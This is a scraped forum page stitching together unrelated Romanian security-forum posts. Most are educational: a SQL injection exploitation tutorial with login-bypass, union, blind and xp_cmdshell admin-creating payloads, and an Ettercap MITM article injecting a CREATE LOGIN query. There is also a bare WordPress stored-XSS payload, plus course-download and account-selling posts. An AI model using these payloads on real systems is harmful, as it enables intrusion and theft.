Leaderboard

Wordpress <= 4.3 Stored XSS [caption width="1" caption='<img src="//google.com/favicon.ico?' ">]</a><a href="http://onload='alert(1)'"> PS: Nu l-am testat.

Salut, Am decis sa inlocuim vechiul vBulletin 4 cu o platforma mult mai moderna si mai utila: IPBoard. Mentionez faptul ca este posibil sa apara probleme pe care insa o sa le rezolvam. Orice problema intampinati, postati aici sau trimiteti-mi un PM. Upgrade-ul a inceput in ianuarie, asadar tot ce s-a postat in ianuarie a disparut. De asemenea, au loc mai multe schimbari de care va rog sa tineti cont: 1. Nu se mai permit lucruri ilegale ca: root-uri, vps-uri, smtp-uri etc. 2. Au disparut cateva categorii: Club ShowOff, Games Hacks etc. Am facut putina ordine. 3. Exista un sistem de Downloads insa nu se permite upload-ul fisierelor cu drepturi de autor. 4. Accesand acest website necesita acceptarea termenilor si conditiilor. Ar fi bine sa cititi acel text, nu este lung. 5. Free stuff va fi limitat, nu se va mai posta orice cont furat. 6. La RST Market se va modera fiecare topic postat. Inca nu stim ce sa facem cu el. 7. Nu mai exista niciun VIP. Cine va fi util de acum inainte va primi VIP. 8. Nu pot oferi o lista completa de modificari, o voi actualiza cu timpul. Scopul acestui forum este sa ajute comunitatea romaneasca in domeniile IT security, programare si multe altele. Odata cu aceasta schimbare, vrem sa scapam de cei care intra aici pentru mizerii: scannere, root-uri si alte prostii care le pot aduce probleme. Daca ati venit aici pentru asa ceva, acesta nu este locul potrivit. Va vom bana pentru orice apropiere de aceste practici. Nu sunteti utili pentru comunitate si nici comunitatea nu este utila pentru voi. Am investit atat bani cat si timp in acest forum (cei din staff + altii). Nu vreau sa vorbesc in numele lor, eu vreau sa continui acest proiect deoarece acum multi ani stiam doar Counter-Strike, insa dupa ceva timp petrecut in aceasta comunitate, cu persoanele din acele timpuri, m-a ajutat si acum lucrez in domeniul IT security. Scopul acestui forum este sa ii educe pe cei noi si sa nu ii duca pe cai gresite, insa fiecare este responsabil pentru actiunile sale. Nu inseamna insa faptul ca forumul va fi complet whitehat :). Tehnici blackhat, exploituri si alte lucruri interesante sunt prezentate de catre nume mari in domeniu la conferinte internationale, deci nu ne vom feri sa le publicam aici. Incercati sa faceti si voi cate ceva, o sa vedeti ca va va ajuta mult pe viitor. Incercati sa ii ajutati pe ceilalti si veti vedea ca veti fi de asemenea ajutati. Mai multe, cu timpul. // Staff-ul RST

Descarcati: https://github.com/nishad/udemy-dl-windows/releases Creati un cont nou pe udemy, nu conteaza ce email folositi pentru ca nu trebuie verificat Deschideti cursul dorit si apasati pe Start Free Preview (apare sub Take This Course) Rulati programul astfel: udemy-dl.exe -u email -p pass <link catre curs> Screenshots pentru cei batuti in cap: Spor la invatat

eu am fost: nu merita argumente: - problemele de la curs sunt copiate din diferite surse GRATUITE de pe internet (luate de la facultati străine și traduse în română) - dacă ai chef să aprofundezi un topic cauți pe net probleme și încerci să le rezolvi, apoi verifici rezolvarea, de ce te-ai duce la un curs fizic pe care să dai bani? - să zicem că te-ai duce pentru că „profesor”, doar că instructorii de acolo am impresia ca nu sunt instructori, sunt orice altceva în sensul că nu știu să dea lămuriri, nu se adaptează la lipsa de cunoștințe preliminare a cursanților (unii chiar vin acolo sperând că vor putea învăța programare așa cum le promite reclama, dar în reliatate află că mai durează un an sau doi de muncă și învățare) - am impresia că nu toți instructorii au atestate, deși ei susțin că le au, totuși nu contează atestatul, un instructor este bun dacă se adaptează la omul din fata lui si face tot posibilul ca indivisul ala sa invete - înveți de la zero dacă ai capacitatea de a învăța copiind exerciții de la colegii mai avansați și dacă înțelegi modul în care funcționează codul - chestia asta o poti face si acasa, fără să fie nevoie să plătești aprox 1000 euro - dacă ai chef de socializare și de ieșit din casă, du-te, îți faci cunoștințe, prieteni, networking, chestii - dacă ai bani plătește pe cineva după ce îți pui bazele singur, sau pur si simplu invata singur si găsește-ți de lucru mergând la interviuri pe entry-level positions unde să prezinți prorpiile proiecte, diplomele lor nu valorează nimic, oricum, fără o facultate relativ asemănătoare ca profil cu IT-ul (gen ase, mate-info de la univ bucuresti si altele asemenea) - la job vei avea de demonstrat practic abilități - chiar dacă te duci acolo, fă-ți un bine și învață algoritmi și teorie java dinainte, altfel îți pierzi vremea aiurea Concluzie: e doar gargară de marketing, poveștile cu indivizi care s-au angajat prin bănci pe la IT departments după doar 2 luni de curs nu sunt altceva decât povești - la mine în grupă au fost cel puțin 2 persoane care deja știau programare bine și care puteau fi angajați, dar ghici cine e încă pe bară după ce a terminat cursul? - poveștile alea sunt doar povești

Dar de ce nu iti iei tu mai bine hosting moca, si iti pui un CMS pe el, cum ar fi Wordpress, Joomla, pula mea.

Asa cum spune si titlul. Caut programator full time cu cunostinte medii spre avansate in limbajele principale de programare: php, mysql, javacript si sa fie capabil sa rezolve si sa invete fiecare obstacol de limbaj nou intalnit. (css, html nici nu se pune problema). Salariu 1000 euro cu posibilitate de crestere + bonusare. Se lucreaza de la sediu, proiectele sunt atractive, iar stresul de la locul de munca 0. Locatie: Bucuresti. Astept PM.

Pai si cu te ajuta sa afli ca se fute cu altii ?

Hai ca iti fac eu site'ul in Joomla daca umplii memoria camerei cu niste porneala de calitate. Pentru eshop iti cer bani ca munca nu e degeaba, e scumpa Daca erai baiat destept puneai si tu linkul de la camera sa vada si lumea ce minunatie ai. Da-mi mesaj si ne apucam de treaba daca imi place camera.

O sa intreb la HR daca se poate, dar in principal sunt Full Time. Daca problema e cumva prezenta la facultate, cred ca nu e chiar o problema. Edit: Acel post este doar full-time.

Am eu cont cu 2 plati in valoare de 200 de euro scoase de pe cont.

The best resources for learning exploit development Fabio Baroni Penetration tester Books Hacking - The art of exploitation A bug Hunter's Diary: A Guided Tour Through the Wilds of Software Security The Shellcoder's Handbook: Discovering and Exploiting Security Holes Sockets, shellcode, Porting, and coding: reverse engineering Exploits and Tool coding for security professionals Writing Security tools and Exploits Buffer overflow attacks: Detect, exploit, Prevent Metasploit toolkit for Penetration Testing, exploit development, and vulnerability research TUTORIALS Corelan.be https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/ https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/ https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/ https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/ https://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/ https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/ https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/ https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/ https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/ https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/ https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/ https://www.corelan.be/index.php/2010/01/26/starting-to-write-immunity-debugger-pycommands-my-cheatsheet/ https://www.corelan.be/index.php/2010/03/22/ken-ward-zipper-exploit-write-up-on-abysssec-com/ https://www.corelan.be/index.php/2010/03/27/exploiting-ken-ward-zipper-taking-advantage-of-payload-conversion/ https://www.corelan.be/index.php/2011/01/30/hack-notes-rop-retnoffset-and-impact-on-stack-setup/ https://www.corelan.be/index.php/2011/05/12/hack-notes-ropping-eggs-for-breakfast/ https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/ https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/ https://www.corelan.be/index.php/2012/02/29/debugging-fun-putting-a-process-to-sleep/ https://www.corelan.be/index.php/2012/12/31/jingle-bofs-jingle-rops-sploiting-all-the-things-with-mona-v2/ https://www.corelan.be/index.php/2013/02/26/root-cause-analysis-memory-corruption-vulnerabilities/ https://www.corelan.be/index.php/2013/01/18/heap-layout-visualization-with-mona-py-and-windbg/ https://www.corelan.be/index.php/2013/02/19/deps-precise-heap-spray-on-firefox-and-ie10/ https://www.corelan.be/index.php/2013/07/02/root-cause-analysis-integer-overflows/ Massimiliano Tomassoli's blog http://expdev-kiuhnm.rhcloud.com/2015/05/11/contents/ Samsclass.info https://samsclass.info/127/127_F15.shtml Securitysift.com http://www.securitysift.com/windows-exploit-development-part-1-basics/ http://www.securitysift.com/windows-exploit-development-part-2-intro-stack-overflow/ http://www.securitysift.com/windows-exploit-development-part-3-changing-offsets-and-rebased-modules/ http://www.securitysift.com/windows-exploit-development-part-4-locating-shellcode-jumps/ http://www.securitysift.com/windows-exploit-development-part-5-locating-shellcode-egghunting http://www.securitysift.com/windows-exploit-development-part-6-seh-exploits http://www.securitysift.com/windows-exploit-development-part-7-unicode-buffer-overflows Justbeck.com http://www.justbeck.com/getting-started-in-exploit-development/ 0xdabbad00.com http://0xdabbad00.com/2012/12/09/hurdles-for-a-beginner-to-exploit-a-simple-vulnerability-on-modern-windows/ fuzzysecurity.com Part 1: Introduction to Exploit Development Part 2: Saved Return Pointer Overflows Part 3: Structured Exception Handler (SEH) Part 4: Egg Hunters Part 5: Unicode 0x00410041 Part 6: Writing W32 shellcode Part 7: Return Oriented Programming Part 8: Spraying the Heap [Chapter 1: Vanilla EIP] Part 9: Spraying the Heap [Chapter 2: Use-After-Free] sploitfun.wordpress.com https://sploitfun.wordpress.com/2015/06/26/linux-x86-exploit-development-tutorial-series/ sneakerhax.com http://sneakerhax.com/jumping-into-exploit-development/ community.rapid7.com https://community.rapid7.com/community/metasploit/blog/2012/07/05/part-1-metasploit-module-development--the-series resources.infosecinstitute.com http://resources.infosecinstitute.com/debugging-fundamentals-for-exploit-development/ rafayhackingarticles.net http://www.rafayhackingarticles.net/2011/07/from-minor-bug-to-zero-day-exploit.html TRAININGS Opensecuritytraining.info http://opensecuritytraining.info/Exploits1.html http://opensecuritytraining.info/Exploits2.html Module 12 of Advanced penetration testing cource on Cybrary.it https://www.cybrary.it/course/advanced-penetration-testing/ Securitytube.net http://www.securitytube.net/groups?operation=view&groupId=7 research megaprimer http://www.securitytube.net/groups?operation=view&groupId=4 exploitation for linux megaprimer http://www.securitytube.net/groups?operation=view&groupId=3 Format string vulnerabilities megaprimer infiniteskills.com http://www.infiniteskills.com/training/reverse-engineering-and-exploit-development.html COURSES Corelan https://www.corelan-training.com Offensive Security https://www.offensive-security.com/information-security-training/advanced-windows-exploitation/ AWE (Advanced windowsexploitation) SANS https://www.sans.org/course/advance-exploit-development-pentetration-testers SANS SEC760: Advancedexploitdevelopment for Penetration Testers Udemy https://www.udemy.com/windows-exploit-development-megaprimer/learn/#/ windows exploit developmentMegaprimer by Ajin Abraham TOOLS IDA Pro OllyDbg WinDbg Mona.py HEAP EXPLOITATION TECHNIQUES https://github.com/shellphish/how2heap VULNERABLE APPLICATIONS Exploit-exercises.com https://exploit-exercises.com/protostar/ Protostar https://exploit-exercises.com/fusion/ Fusion 28 hacking sites to practise your skills in a legal way https://www.peerlyst.com/blog-post/practise-your-infosec-skill-on-these-legal-28-hacking-sites EXPLOITS database https://www.exploit-db.com https://www.milw00rm.com http://0day.today https://packetstormsecurity.com http://www.securityfocus.com http://www.windowsexploits.com http://iedb.ir http://www.macexploit.com Sursa: https://www.peerlyst.com/posts/the-best-resources-for-learning-exploit-development

SQL Injection: Exploitation Published on February 9, 2016 By HollyGraceful on Injection, OWASP Top 10, Web Application Security Structured Query Language (SQL) is used all over the web and is potentially vulnerable to an injection attack any time that user input is insecurely concatenated into a query. An injection attack allows an attacker to alter the logic of the query and the attack can lead to confidential data theft, website defacement, malware propagation and host or network compromise. SQL and a SQL Injection Primer For those less familiar with SQL it is a language used for storing, retrieving, modifying and removing data from a database. It can often also be used to read or modify files on the remote system and execute operating system commands. There are many variations such as Microsoft SQL, MySQL or PostgreSQL. There are different query types in SQL, such as SELECT, INSERT, UPDATE and DELETE as well as the idea of “Stored Procedures”. These are used for retrieving data from the database (SELECT), adding new rows to a table (INSERT), taking a table row and modifying it (UPDATE) or removing rows from a table (DELETE). There are many different stored procedures however an interesting one is the MSSQL procedures xp_cmdshell which can be used for executing commands on the remote database host. SELECT Statements retrieve data from the database and look like: SELECT column FROM table WHERE condition is true For example the following could be used for a login system: SELECT username,password FROM users WHERE username='$INPUT1$' AND password='$INPUT2$'; Where $INPUT1$ and $INPUT2$ is text taken from the user of the application. Statements are separated by semi-colons, so two statements could be “stacked” and executed one after the other by separating them with a semi-colon. Developers can add comments into a statement by preceding the comment with a ” −− ” before the comment, which makes the SQL parser ignore any following text. The above statement concatenates user input into the query and is therefore vulnerable to SQL injection, as an attacker can simply add characters within $INPUT1$ or $INPUT2$ to alter the logic of the statement. Taking this into account an attacker could utilize the following payload for INPUT1 to cause a login bypass: x’ OR 1=1 −− This works as the input would change the command to the following: SELECT username,password FROM users WHERE username='x' OR 1=1 -- ' AND password='$INPUT2$'; As you can see from the above, the double dash has caused the password check to be “commented out” so that it has no effect. Also if you remember back to the first SQL command I showed highlights that the SELECT statement evaluates the WHERE clause to determine if it is a Boolean true. That’s what the OR 1=1 part of the input achieves, as one always equals one. The effect on many applications that are vulnerable to SQL injection in the login form is that all account data will be returned and the database will simply log in the attacker in as the first user in the database. As you can see the attacker has altered the intended logic of the statement and they could use this to bypass authentication, cause the database to leak confidential information or even execute functions such as executing operating system commands. Many times it can be tempting to leave SQL exploitation down to automated tools, but I recommend all juniour Penetration Testers get as deep into manual exploitation as they possible can so that they can really understand what the tool is up to, especially in preparation for the day that the tool fails and you’ve got to crack a can of caffeine and do it all manually. Detecting Vulnerable Functions Detecting SQL injection is fairly simple if errors are enabled and displayed in raw form to the user. If an attacker adds an apostrophe the the input it will cause an unbalanced number of quote marks and an error like “You have an error in your SQL syntax” will be shown, great you have a valid SQL injection point, however if errors are customized or simply not rendered to the user then you have to try a little harder! the most effective way to do this is to alter the query in such a way that it could only possibly be that you have successfully injected into SQL. So very SQL-like syntax being parsed in the expected way. Consider he following query which loads a news article from the database to display on an fictitious web application: SELECT id,title,content FROM tblArticles WHERE id=$input Which is accessed through the following URL: http://sql.example.org/news?id=100 Now a simple way to determine is the parameter “id” is vulnerable to injection would be would be to try the following URLs and see how the server reacts: http://sql.example.org/news?id=100 http://sql.example.org/news?id=101 http://sql.example.org/news?id=101-1 If the server is appropriately vulnerable it would be expected that the first and second URL show different articles whereas the third one is evaluated by the database and produces the same output as the first URL. If the statement 101-1 is not evaluated then there’ll be a notable change in output. The above example, obviously, will only work on integer inputs, if the id parameter was instead a string input like this: http://sql.example.org/news?page=example With the above case it’s possible to utilize string concatenation in a similar way, where if the string is evaluated and concatenated then the output should not change whereas if it is no evaluated then a noticeable change in output will occur. The method of concatenation differs between back-end database types however if one works you have the added benefit of fingerprinting the database type! MSSQL: exa'+'mple With URLs a + is space, use %2b instead (URI encoded plus sign)! MySQL: exa' 'mple (that's a space between two apostrophes) Oracle: exa'||'mple An additional way of detecting of detecting functions that are vulnerable is to concatenate a simple conditional at the end of the input, such as: AND 1=1 -- AND 1=2 -- The idea with these payloads is that the top option of 1=1 will not alter the logic of the query in anyway (as 1 does in fact equal 1) although the second payload will break the query and therefore the application would operate in a noticeably different way, such as missing text on the page (and therefore a shorter content length), a faster response time, a visible error or a different status code. The application should also have the same effect regardless of what the conditional was, so 1=1, 2=2 and 3=3 should all have the same effect, as should payloads such as: AND (SELECT @@version)=(SELECT @@version) -- The above payload is useful because its very SQL-like and whilst there may be some application logic which interprets 1=1 it’s very unlikely that outside of a SQL injection context you’ll get the same response from the above payload. It’s important to note however, that this payload is vendor specific, so the above will work on MSSQL and MySQL but not PostgreSQL. There’s a suitable payload for each of the backends however. The PostgreSQL equivalent would be: AND (SELECT version())=(SELECT version()) -- Types of Injection Whilst the above example is a simple demonstration of SQL and how injection can be use to the benefit of an attacker, as the attacker has the full flexibility of SQL at their disposal there is much more that they can do than simply bypassing an application’s login form. There are different types of injection covered within this article are: Boolean Error Union Stacked Time In terms of injection it’s not exactly a case of preference but simply what is available in the context of the vulnerable parameter. You’ll definitely prefer to find Union or Error based over Boolean and Time based due to the effort levels required to exploit them but you’ll have to deal with what you’re given when it comes down to it. Different injection types will be available depending on the original query which you are injecting into as well as any filters that are in place to prevent malicious input. Exploitation There are five injection types and I’ll cover them each in turn, once you get the hang of the first however the others operate much as you’d expect but I’ll run through a full working example of each to make sure there’s no important details missed out, plus it’ll show how I generate payloads and build up from detection to data exfiltration. Error Based Error-based SQL injection comes about when errors from the SQL database are exposed to the attacker by being embedded in application responses. Detection is generally as simple as placing an apostrophe in the parameter an you’d receive an error along the lines of: Microsoft SQL Native Client error ‘80040e14’ Unclosed quotation mark after the character string The exact error depends on the backend database. These errors can be controlled and by crafting input you can cause the error to contain data from the database itself. For example, if you are injecting into an integer input you can cause a type clash which will disclose information like this: AND 1 in (SELECT @@version) with input like this you’ll get an error along the following lines: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 R2 (SP1) - 10.50.2500.0 (X64) Jun 17 2011 00:54:03 Copyright (c) Microsoft Corporation Standard Edition (64-bit) on Windows NT 6.2 <X64> (Build 9200: ) (Hypervisor)' to data type int. This works as the database attempts to convert the string to an integer, cannot, and throws an error that reveals the information. This means that an attacker can place any select statement that returns a string within the brackets of the payload and the error will contain the desired output. However it’s a touch more complex if you’re injecting into a string, but only a touch. As you couldn’t cause a cast error by converting to an integer you can expand the payload to be something along these lines: AND 1 IN (SELECT 'Extract:' + CAST((SELECT 1) as varchar(4096))) -- Here you can replace (SELECT 1) with the SQL statement you would like to execute and retrieve the contents from. The way that this injection works is to concatenate the desired data onto the end of the string “Extract” and then attempts to cast that to an integer which causes an error, so in the case of the example the resulting error would be: Error Type: Microsoft SQL Native Client (0x80040E07) Conversion failed when converting the varchar value 'Extract:1' to data type int. So an attacker can effective run arbitrary SQL statements and capture the output easily if errors are embedded within the application. If errors are gracefully handled however this doesn’t stop an attacker completely, they just have to use a different injection technique. Union Based The UNION operator allows two or more SELECT statements to be combined, the idea being that a developer may run a query such as listing all of the products available in a store and an attacker can combine this with an additional query, such as listing all of the usernames and passwords in the customers table. To utilise a union though the attacker must request the same number (and type) as the original query and therefore needs to know how many columns are being used. There are two ways to do this, the first is to use NULLs in place of the columns to determine how many columns there are, such as: UNION SELECT NULL -- UNION SELECT NULL, NULL -- UNION SELECT NULL, NULL, NULL -- UNION SELECT NULL, NULL, NULL, NULL -- UNION SELECT NULL, NULL, NULL, NULL, NULL -- UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL -- UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL -- …and continue until you’ve determined how many columns there are – if you get the incorrect number of columns an error condition will occur and if you get the right number then the application will run unhindered. You can then swap out the NULL with datatypes to determine which ones are correct, such as: UNION SELECT 'abcd', NULL, NULL, NULL -- UNION SELECT 1, NULL, NULL, NULL -- Work them out one at a time until you end up with something like this: UNION SELECT 1, 'string', 'string', 'string' -- At this point you have a working SELECT statement where the output will be appended to the normal output the application gives! If you’ve got a lot of columns and writing out all of those NULLs is too much like hard work there’s another method of doing the original column count enumeration, using ORDER BYs. If you attempt to order by a column number which is higher than the number of columns it’ll throw an error. So you can start low and work up until you see an error: ORDER BY 1 -- ORDER BY 2 -- ORDER BY 3 -- ORDER BY 4 -- Blind Boolean If the application gracefully errors, and it’s not possible to combine queries with UNION, then an attacker can use inference to determine the answer to queries about the database. The payloads we used earlier to prove the existence of injection are simple examples of this: AND 1=1 -- AND 1=2 -- Essentially these are asking yes or no questions of the database and the result shows the answer. “Does 1=1?” Yes of course it does and therefore the normal output of the application will be visible. “Does 1=2”? No it does not and therefore there should be a noticeable chance, this could be in the response length, time of execution, or HTTP response code (just like before). However we can expand up on this idea to ask more in-depth questions of the database, as long as we can phrase them as Yes/No questions. For example, “Is the first letter of the current user the letter ‘a'”? That’d look something like this: AND SUBSTR(SELECT user_name(), 1, 1)='a' -- We can cycle through: b, c, d, e until we get a “true” response – then move on to the second character and so on. A time consuming and request intensive process but it can be automated quite easily with python (or Burp Intruder!) Time-Based Blind If the application does not embed responses so you can’t use UNION, if it doesn’t show error messages an it’s not possible to determine the output of a boolean then there is still hope! If you can’t infer the output to a boolean through application responses you can add a notable difference yourself through time delays. Effectively using IF statements and delays you can ask the application “Does A=A? If so, please delay your response by five seconds and if not then immediately respond”. Then by detecting lag in the response you’ll get your answer! Simple…but very time consuming… A payload like this will work for MSSQL: IF('a'='a') WAITFOR DELAY '0:0:5' -- Then you can simply replace the ‘a’=’a’ with whatever yes/no question it was that you’d like to ask. Stacked Queries (and possibly command execution!) A final thing which is worth noting, is that it may be possible to close off the developers query and start a completely new query from scratch, something as simple as: ; WAITFOR DELAY '0:0:5'; -- If this works you’ll get a delay as you did in the previous example, however as you’re able to execute new full queries it is also potentially possible to execute stored procedures – such as xp_cmdshell on MSSQL. This stored procedure allows for the execution of operating system commands on the database server. There are two problems. The first problem is, on modern MSSQL servers xp_cmdshell is disabled by default…but you can re-enable it through SQL Injection! The second problem is that to execute this procedure, you probably need to be running as the sa user. If you’re lucky those and you are sa, here’s the steps to execute OS commands: EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; Now that’s done, you can go ahead and use the xp_cmdshell: exec master..xp_cmdshell 'dir c:\'; -- That’ll execute the dir command! One…small hitch…the output of the command isn’t returned…an easy way to get around that would be to just attack the application blind, for example: exec master..xp_cmdshell 'net user foobar Password123 /add'; -- exec master..xp_cmdshell 'net localgroups "Administrators" /add'; -- The above command adds a new local administrator to the remote server. That might help. Alternatively you can redirect the output of the executed command to a database table and read the contents of the table through SQL injection! You can create a table and store the output of a command to it with the following: ; create table #output (id int identity(1,1), output nvarchar(255) null); ; insert #output (output) exec @rc = master..xp_cmdshell 'dir c:'; Then to read the contents out with a SELECT statement like this one: ; select * from #output where output is not null order by id; A quick note on filter evasion… If there’s a filter in place to prevent the execution of payloads above then there are a few things to try. First of all be aware that you can flip case without any problem: SELECT sElEcT Also if whitespace is filtered, then you can replace spaces with comments for the same effect: AND 1=1 -- /**/AND/**/1=1/**/-- Finally if you can’t comment out the end of a query you can “gracefully close” the statement instead: ' AND 1=1 -- ' AND 1=1 OR 'a'='a Defending against Injection As I said at the start of this article the issue really is that user input is insecurely concatenated into a query. So there’s two things to note here, the first is concatenation and the fix here is instead to use “parametrized” or “prepared” statements, these are available in all modern languages and frameworks, these effectively separate the query from the user input so that the database cannot mix the two up and effectively stop SQL injection attacks on their own. An example for PHP can be found in the PHP documentation here, which gives a flavour of the general idea. However another thing to consider, to stop other kinds of injection and web application attack, it’s a good idea to consider filtering all user input. I’ve written about user input filtering tactics here. Sursa: https://www.gracefulsecurity.com/sql-injection-exploitation/

By Rick Osgood | February 5, 2016 During a recent penetration test, I was performing some packet captures and noticed some unencrypted Microsoft SQL Server (MSSQL) traffic. The syntax was unmistakable. At first I thought this might be a way to capture some authentication credentials. However, MSSQL encrypts login traffic which meant I would have to crack the encryption to get credentials. If the installation uses a self-signed certificate, that is fairly easy to crack. Unfortunately, for this particular client engagement, cracking SQL Server encryption was beyond the scope of the project. So, I had to set my curiosity aside for the time being and complete the penetration test for the client. However, I could not help thinking I was on to something. Was there a way to attack a SQL Server box without any credentials? I decided to take my hypothesis to the lab and try some experiments. What I found was that with a little packet hacking, I could take control of a Microsoft SQL Server box without having any stolen credentials using a Man in the Middle style attack. Man in the Middle Back in my lab, I began to research this more. For my investigation, I was running MSSQL Server 2014 Express on Windows Server 2012 R2. The client machine was a Windows 10 system running MSSQL Management Studio 2014. My attack machine was a relatively new installation of Kali 2.0 Linux. All of these systems are on the same subnet, simulating an attacker on the internal network. This was nearly identical to the setup I had at the client site. This type of attack is known as a man-in-the-middle (MITM) attack. Anitian does these a lot, as we have a lot of expertise on hacking infrastructure devices. The typical setup is to perform some kind of redirect, like an ARP cache poison (which is still possible in some environments), which forces traffic between two systems to be redirected through the attacker’s computer. This allows the attacker to not only see all of the data between the victims, but potentially also to manipulate that traffic. This was exactly what I wanted to do. Understanding the Data The first thing I needed to do was to look at the MSSQL query traffic. In order to make this test more interesting, I used the “SA” account to login. The SA account is the system admin account in SQL Server and can do anything. If my experiments were successful, I could do a lot of fun things with the SA account’s privileges. Once logged in, I launched Wireshark 2.0 on the SQL Server box. It started capturing traffic on the primary interface. I configured Wireshark to use a display filter “tds.query”. This hides all the other traffic and displays just the TDS query packets. (Incidentally, I noticed that the “tds.query” filter object is not available on older versions of Wireshark.) With a traffic capture underway, I switched back to the workstation and executed a query against the sample database I built for this test. The database is called testdb and includes one table called Products. The Products table has two columns named ProductID and ProductName. There is no actual data in the table, but for this test that is unnecessary. This query is designed to pull all information from the database table. The query was executed successfully and the empty table was returned to me. You can see the empty columns listed toward the bottom-right of the screenshot. Switching back to Wireshark, I stopped the capture and looked at the captured data. I spotted one TDS query packet. Clicking on that packet showed me all of the data contained within. MSSQL Server 2014 Express did not have encryption enabled by default, so this data was easy to access. Looking at the decoded data at the bottom of the center pane, it is easy to identify the query. It even includes the carriage return and newline characters. Something interesting to notice is that in between each character of the query is a null byte (hexadecimal 0x00) which is normal for Unicode. This is only noticeable when looking at the raw data in the bottom pane. Wireshark displays these bytes as period characters but really, they are null. This meant that I couldn’t just look for a simple string like “select”. I’d have to take those Unicode null bytes into consideration when searching for the data later, and for when I ultimately try to replace it with my own data. Fun with Ettercap Filters Now that I knew what the data looked like, I could try to find a way to manipulate it. I decided to use Ettercap. Ettercap is a tool specifically designed to perform MITM attacks. It also has a nifty built-in feature called Ettercap filters. A filter would allow me to search the packets for specific data and then manipulate that data. You just write the filter and load it into Ettercap. Then Ettercap automatically replaces data every time it finds a match. The functionality is somewhat limited, but it should work for proof of concept. The filters are written in a simple scripting language. The important functions I intended to use were the search and replace functions. The search function will search for specific data within the packets. The replace function will actually search for data and then replace it with other data. That was the key to this project. Since the TDS query data includes those null bytes, some of the characters are not printable. This meant that I could not merely search for a simple string and replace it with another string. I needed a way to search for a non-printable null byte. Since I cannot type null on a keyboard, I needed another way. Fortunately, Ettercap filters support hexadecimal using “\x” to escape. For example, to search for the letter ‘s’, I can tell Ettercap to search for “\x73”. The null bytes are easily searchable now by searching for “\x00”. Kali includes a program called hexdump that can be used to convert strings to hexadecimal. I used this to convert the string “select” to hex. Once I had the data I needed, I wrote the first test filter and called it “mssql.filter”. The first line ensures that the filter will only run on TCP traffic with a destination port of 1433. If this matches, the filter will output a debugging message to the console to let me know that it found SQL traffic. This is just for my own peace of mind so I know it’s at least partially working. The next “if” statement searches for a string of hex data. This data translates to “select” with null bytes in between each character. If the filter locates that string, it will output another debugging message to the console. Finally, the magic happens. The replace command swaps that exact string with a different string of “ssssss” including the required null bytes. This was just a test to see if the script would run properly. It is important to note that when you replace data in a TCP packet, you must replace it with the exact same number of bytes. If the size of the packet changes, the TCP connection will break. Once the filter is written, it must be compiled. This is easily accomplished with the etterfilter command. There were no errors, so the filter was now ready for testing. I fired up the Ettercap graphical interface and launched an ARP spoofing attack against the MSSQL server and the client workstation with sniffing enabled. I fired up Wireshark and verified that I was seeing traffic being sent between the two victims. Then in Ettercap I went to “Filters -> Load a filter” and chose my filter. I was rewarded with a “Content filters loaded” message down in the Ettercap console. Almost immediately I was receiving “SQL Traffic Discovered” messages as well. Everything was looking positive. The next step was to switch back to the workstation and try executing the query. If it goes according to plan, the “select” string should be replaced with “ssssss” and break the query. I executed the query, but this time I did not receive the empty table result like I did originally. Instead, I received an error. “Incorrect syntax near ‘ssssss’.” That’s perfect! The filter worked exactly as expected. It replaced the “select” string with “ssssss”. The MSSQL server did not know how to handle that and returned an error. That was one step in the right direction. The next step was to replace the entire query string with something that will help me as the attacker. Create the Login I decided to try to add a login to the server. This would be pretty much the best possible scenario for me as an attacker, especially since in this case the workstation victim is logging in as the SA user. In order to add a login, I would have to submit this query to the MSSQL server: CREATE LOGIN anitian WITH PASSWORD=’YouGotHacked1#’; This would add a user to the MSSQL server called “anitian” with the password “YouGotHacked1#”. After converting everything to hex, I updated the mssql.filter file to contain the new data. This filter will search for the string “select ProductID, ProductName from Products where ProductID=1;” and then replace it with the string “CREATE LOGIN anitian with PASSWORD=’YouGotHacked1#’”. I mentioned earlier that you must replace TCP data with the exact same amount of data. So how did I handle that since my new query is shorter than the original? I just added some spaces to the end of my new query with the null bytes surrounding them. This would ensure that the TCP packet stayed the same size, but the spaces wouldn’t interfere with my query being executed successfully. I compiled the filter just like before and then loaded it up into Ettercap. Then I submitted the query from the workstation. Notice the difference between this response and the response before I used the Ettercap filter? Originally, the query returned an empty table. This time, no table was returned. Instead, the server returned a message, “Command(s) completed successfully.” If a database administrator saw this, they would likely dismiss it as some strange error. Unfortunately, they would be too late. I just added my own account to the database system. Now, the real hack was about to take place. From the Windows 10 workstation I logged out of the SA account and then attempted to log in using my (hopefully) newly created anitian account. SUCCESS! I was now logged in with my own account. Unfortunately this account did not have a lot of rights, so I could not do much. However, that could be solved. The next step would be to prepare another Ettercap filter to adjust my account’s rights and then perform a second SQL query injection attack. At this point, I could have easily done all this, but it is rather tedious to do all the hex conversions by hand, and then add all of those null bytes and such. Who wants to go through all of that effort? This was a good enough proof of concept right? No way! I was not about to give up that quickly. Besides, why do all that tedious work, when I can automate the entire process using a script! Automating the Hack The SQLinject.sh shell script can be downloaded here: http://pastebin.com/Nge9rx7g This 